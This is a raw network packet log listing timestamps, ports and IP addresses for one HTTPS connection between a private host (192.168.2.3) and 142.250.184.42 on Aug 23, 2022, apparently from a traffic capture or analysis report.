Aug 23, 2022 03:43:41.866307020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866332054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866358042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866384983 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866411924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866437912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866462946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866488934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.866624117 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.867429972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.867476940 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.867508888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.867542982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.867577076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.867609024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.867746115 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.870899916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.870934963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.870969057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871001005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871033907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871068001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871103048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871136904 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871171951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871206999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871481895 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.871936083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.871975899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872008085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872041941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872076035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872112036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872148991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872180939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872212887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872246981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.872525930 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.873975992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874012947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874047995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874080896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874119043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874155045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874188900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874224901 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874255896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874289036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874321938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.874546051 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.879597902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879658937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879704952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879744053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879761934 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.879784107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879826069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879865885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879904985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879945040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.879985094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880026102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880065918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880109072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880155087 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880196095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880235910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880275011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880312920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880388021 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.880647898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880690098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880728960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880768061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880808115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.880848885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881032944 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.881308079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881345987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881371021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881397963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881422043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881445885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881470919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881494045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.881561995 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.882519960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882558107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882586002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882611036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882637024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882661104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882683992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882711887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882733107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882751942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882774115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882797003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882821083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882846117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882870913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882894993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882920027 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.882925987 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.882976055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.883002043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.883027077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.883300066 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.884268999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884294987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884320021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884342909 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884366035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884388924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884412050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884437084 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884460926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884484053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884510040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884536028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884572029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884597063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884609938 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.884622097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884649038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884670973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884695053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.884789944 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.886346102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886379004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886404037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886431932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886455059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886480093 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886508942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886533022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886557102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886579990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886603117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886626005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886643887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886668921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886694908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886720896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886745930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886768103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886792898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886816978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886842012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886894941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886919975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886960030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.886986017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887008905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887033939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887058020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887255907 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.887464046 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.887545109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887573957 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887600899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887625933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887651920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887676001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887705088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887728930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887754917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887767076 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.887782097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887809038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887835979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887861013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887887001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887912989 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.887939930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.888508081 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.889800072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.889856100 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.889883041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.889913082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.889938116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.889971018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890002012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890028000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890053034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890077114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890101910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890130997 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890131950 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.890156984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890182972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890208006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890233040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890258074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890285015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890311956 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890314102 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.890337944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890362978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890383959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890407085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890433073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890456915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890480995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890502930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890528917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.890949965 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.891582966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891638041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891680002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891717911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891757011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891794920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891834021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891875029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891911030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891942978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.891982079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892019987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892059088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892098904 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892141104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892180920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892219067 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892256975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892294884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892330885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892369986 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892421961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892471075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892513037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892551899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892591000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892595053 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.892631054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892668962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892721891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892771959 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.892781973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892823935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892864943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892904043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892942905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.892983913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.893023014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.893028021 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.893062115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.893101931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.893141985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.893455982 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.894284010 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894328117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894366980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894428968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894468069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894507885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894547939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894589901 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894629002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894668102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894709110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894747019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894784927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894824028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894864082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894903898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894927979 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.894942999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.894984961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895023108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895061016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895098925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895139933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895181894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895236015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895272970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895313025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895395041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895425081 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.895454884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895493984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895531893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895584106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895615101 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.895622969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895663977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895767927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895807981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895845890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895884991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.895921946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900165081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900201082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900229931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900262117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900295019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900326967 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900357008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900388956 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900409937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900433064 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900454998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900482893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900504112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900531054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900561094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900590897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900619984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900648117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900677919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900706053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.900882006 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.901141882 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.901320934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901364088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901396036 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901426077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901457071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901493073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901535988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901571989 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901602030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901633024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901660919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901695013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901727915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901757002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901787043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901813984 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901843071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901871920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.901932955 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.902184963 CEST	64969	443	192.168.2.3	142.250.184.42
